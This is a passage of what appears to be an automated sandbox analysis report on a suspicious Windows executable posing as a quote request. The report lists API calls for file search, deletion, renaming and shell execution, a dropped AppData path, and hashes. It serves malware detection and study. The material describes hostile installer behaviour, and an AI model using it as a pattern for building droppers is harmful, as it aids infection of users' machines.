                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                      • String ID: $M$N
                                                      • API String ID: 1638840714-813528018
                                                      • Opcode ID: 04f3f42b2e655a6bf1bbe546ad9d96aad2a2205ad87ede7fab540f4b471b76d2
                                                      • Instruction ID: 2f8963ba0b06e8e3d6cb077b811a33c65d2f4829f178f5176880c359a33aa38b
                                                      • Opcode Fuzzy Hash: 04f3f42b2e655a6bf1bbe546ad9d96aad2a2205ad87ede7fab540f4b471b76d2
                                                      • Instruction Fuzzy Hash: 1D026FB0A00209EFDB249F54DD45AAE7BB5FB84314F10857AF610BA2E1C7799D42CF58
                                                      APIs
                                                      • GetDlgItem.USER32(?,000003FB), ref: 004045C8
                                                      • SetWindowTextW.USER32(00000000,?), ref: 004045F2
                                                      • SHBrowseForFolderW.SHELL32(?), ref: 004046A3
                                                      • CoTaskMemFree.OLE32(00000000), ref: 004046AE
                                                      • lstrcmpiW.KERNEL32(: Completed,004226E8,00000000,?,?), ref: 004046E0
                                                      • lstrcatW.KERNEL32(?,: Completed), ref: 004046EC
                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046FE
                                                        • Part of subcall function 00405743: GetDlgItemTextW.USER32(?,?,00000400,00404735), ref: 00405756
                                                        • Part of subcall function 004062AE: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406311
                                                        • Part of subcall function 004062AE: CharNextW.USER32(?,?,?,00000000), ref: 00406320
                                                        • Part of subcall function 004062AE: CharNextW.USER32(?,00000000,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406325
                                                        • Part of subcall function 004062AE: CharPrevW.USER32(?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406338
                                                      • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000001,004206B8,?,?,000003FB,?), ref: 004047C1
                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047DC
                                                        • Part of subcall function 00404935: lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                                        • Part of subcall function 00404935: wsprintfW.USER32 ref: 004049DF
                                                        • Part of subcall function 00404935: SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                      • String ID: : Completed$A$C:\Users\user\AppData\Roaming\thrombopenia$&B
                                                      • API String ID: 2624150263-1239992044
                                                      • Opcode ID: 8f775fb3ea646de8834d5ea4bf79a40c8e6bb2c6a0c6d8ae6640a0167b8418f2
                                                      • Instruction ID: 0d30bce32a668ce4acefc1b856fca7f6450f1747cfb7256993ff8e50c76d0062
                                                      • Opcode Fuzzy Hash: 8f775fb3ea646de8834d5ea4bf79a40c8e6bb2c6a0c6d8ae6640a0167b8418f2
                                                      • Instruction Fuzzy Hash: 9BA170B1900218AFDB11AFA5DD85AAF77B8EF85314F10843BFA01B62D1D77C89418B6D
                                                      APIs
                                                      • DeleteFileW.KERNEL32(?,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405834
                                                      • lstrcatW.KERNEL32(004246F0,\*.*,004246F0,?,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040587C
                                                      • lstrcatW.KERNEL32(?,00409014,?,004246F0,?,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040589F
                                                      • lstrlenW.KERNEL32(?,?,00409014,?,004246F0,?,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058A5
                                                      • FindFirstFileW.KERNEL32(004246F0,?,?,?,00409014,?,004246F0,?,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004058B5
                                                      • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405955
                                                      • FindClose.KERNEL32(00000000), ref: 00405964
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405818
                                                      • \*.*, xrefs: 00405876
                                                      • "C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe", xrefs: 0040580B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                      • String ID: "C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                      • API String ID: 2035342205-655548459
                                                      • Opcode ID: b22725c9d1379137a20526b6b5dca3a9dfa803cbd6e10eb7e01ed1832fa3af48
                                                      • Instruction ID: b6454d918ebd5faba2d20934ef042a1c7892e73fe5aa147b237895e66f915a66
                                                      • Opcode Fuzzy Hash: b22725c9d1379137a20526b6b5dca3a9dfa803cbd6e10eb7e01ed1832fa3af48
                                                      • Instruction Fuzzy Hash: 0041BF71900A14FACB21AB658C89EBF7678EB41768F10817BF801751D1D77C4981DEAE
                                                      APIs
                                                      • CoCreateInstance.OLE32(004074E4,?,00000001,004074D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                      Strings
                                                      • C:\Users\user\AppData\Roaming\thrombopenia\Clothesbag25, xrefs: 00402154
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: CreateInstance
                                                      • String ID: C:\Users\user\AppData\Roaming\thrombopenia\Clothesbag25
                                                      • API String ID: 542301482-515977828
                                                      • Opcode ID: 13dcccc13ea87bb0556e1c07569e348d8a88b33b8c7c11309abf84e89f0bf15d
                                                      • Instruction ID: 3ca7e19c9ce8fc1ac7a66f6cc25710137151f8511148443d739b2fd9411afead
                                                      • Opcode Fuzzy Hash: 13dcccc13ea87bb0556e1c07569e348d8a88b33b8c7c11309abf84e89f0bf15d
                                                      • Instruction Fuzzy Hash: C6412D71A00204AFCF00DFA4CD88AAD7BB5FF48314B2045BAF515EB2D1DB799A41CB54
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: FileFindFirst
                                                      • String ID:
                                                      • API String ID: 1974802433-0
                                                      • Opcode ID: c32a85c171eab7676e44a2814eb8efa7c64b730574f9ff866e2b1adf1713f417
                                                      • Instruction ID: 35ddb734ec7d865f8f709f830fd12decc1a753c42de70ab183506872ff8e9077
                                                      • Opcode Fuzzy Hash: c32a85c171eab7676e44a2814eb8efa7c64b730574f9ff866e2b1adf1713f417
                                                      • Instruction Fuzzy Hash: 0DF08271A00114DBC711EFA4DD49AAEB374FF44324F20457BF115F21E1D7B899409B29
                                                      APIs
                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404319
                                                      • GetDlgItem.USER32(?,000003E8), ref: 0040432D
                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040434A
                                                      • GetSysColor.USER32(?), ref: 0040435B
                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404369
                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404377
                                                      • lstrlenW.KERNEL32(?), ref: 0040437C
                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404389
                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040439E
                                                      • GetDlgItem.USER32(?,0000040A), ref: 004043F7
                                                      • SendMessageW.USER32(00000000), ref: 004043FE
                                                      • GetDlgItem.USER32(?,000003E8), ref: 00404429
                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040446C
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 0040447A
                                                      • SetCursor.USER32(00000000), ref: 0040447D
                                                      • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 00404492
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040449E
                                                      • SetCursor.USER32(00000000), ref: 004044A1
                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 004044D0
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004044E2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                      • String ID: : Completed$N$open
                                                      • API String ID: 3615053054-3069340868
                                                      • Opcode ID: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                                      • Instruction ID: 22110145f907261e11c2f5d787c062fb689e5c30422f2648b08f84481e86c76f
                                                      • Opcode Fuzzy Hash: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                                      • Instruction Fuzzy Hash: 567184B1900209BFDB109F60DD45B6A7B69FB94354F00843AFB01BA2D0C778AD51DFA9
                                                      APIs
                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                      • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                      • String ID: F
                                                      • API String ID: 941294808-1304234792
                                                      • Opcode ID: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
                                                      • Instruction ID: 0e42b5f20bdf07c2dc1b789da504779860c4ba9591388ef730275887389fb1b0
                                                      • Opcode Fuzzy Hash: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
                                                      • Instruction Fuzzy Hash: 0C418A71804249AFCF058FA5DD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                      APIs
                                                      • lstrcpyW.KERNEL32(00425D88,NUL,?,00000000,?,?,00405EDC,?,?), ref: 00405D58
                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405EDC,?,?), ref: 00405D7C
                                                      • GetShortPathNameW.KERNEL32(?,00425D88,00000400), ref: 00405D85
                                                        • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                                        • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                                      • GetShortPathNameW.KERNEL32(00426588,00426588,00000400), ref: 00405DA2
                                                      • wsprintfA.USER32 ref: 00405DC0
                                                      • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405DFB
                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E0A
                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E42
                                                      • SetFilePointer.KERNEL32(00409558,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409558,00000000,[Rename],00000000,00000000,00000000), ref: 00405E98
                                                      • GlobalFree.KERNEL32(00000000), ref: 00405EA9
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EB0
                                                        • Part of subcall function 00405BEF: GetFileAttributesW.KERNELBASE(00000003,00402E2E,00437800,80000000,00000003,?,?,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00403500,?), ref: 00405BF3
                                                        • Part of subcall function 00405BEF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00403500,?), ref: 00405C15
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                      • String ID: %ls=%ls$NUL$[Rename]
                                                      • API String ID: 222337774-899692902
                                                      • Opcode ID: d0bebfde44d1b8ec79e846926d7a4151a37a86d35e5e56b98e3bdf1b29062508
                                                      • Instruction ID: 320379bf9b7b256e7873fa455d25e0b3442936e7d724c6c18c2d1b17e2228676
                                                      • Opcode Fuzzy Hash: d0bebfde44d1b8ec79e846926d7a4151a37a86d35e5e56b98e3bdf1b29062508
                                                      • Instruction Fuzzy Hash: CF31FF31A04B14BFD2216B659C49F6B3A5CDF41759F14043ABA41F62D3EA3CAA008ABD
                                                      APIs
                                                      • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406311
                                                      • CharNextW.USER32(?,?,?,00000000), ref: 00406320
                                                      • CharNextW.USER32(?,00000000,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406325
                                                      • CharPrevW.USER32(?,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406338
                                                      Strings
                                                      • *?|<>/":, xrefs: 00406300
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004062AF
                                                      • "C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe", xrefs: 004062AE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: Char$Next$Prev
                                                      • String ID: "C:\Users\user\Desktop\Priority_Quote_Request_Items_List.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 589700163-2218220722
                                                      • Opcode ID: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
                                                      • Instruction ID: 142112f625556876e4cd031ade27854873566ffa35591fc5fadb0a313d070af9
                                                      • Opcode Fuzzy Hash: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
                                                      • Instruction Fuzzy Hash: 0711B616C0021299DB307B19DC40AB7A6E8EF99750B56803FED86732C1E77C5C9286BD
                                                      APIs
                                                      • CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040568B
                                                      • GetLastError.KERNEL32 ref: 0040569F
                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056B4
                                                      • GetLastError.KERNEL32 ref: 004056BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1516939086.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1516923038.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516954724.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1516971810.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1517070523.000000000048A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Priority_Quote_Request_Items_List.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                      • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$s@
                                                      • API String ID: 3449924974-3344362595
                                                      • Opcode ID: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                                      • Instruction ID: 58cf5789918ac3341f57974bf76304b0811093b13c64c6dd82c549f991abc1cf
                                                      • Opcode Fuzzy Hash: 1b08ca72398e2981408f93d34e223770c5590cbaa7956eb772955fb128fddff0
                                                      • Instruction Fuzzy Hash: 6D010871D14219DAEF119FA0D8487EFBFB8EF14354F40853AE909B6190D3799604CFAA
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 00404162
                                                      • GetSysColor.USER32(00000000), ref: 0040417E
                                                      • SetTextColor.GDI32(?,00000000), ref: 0040418A
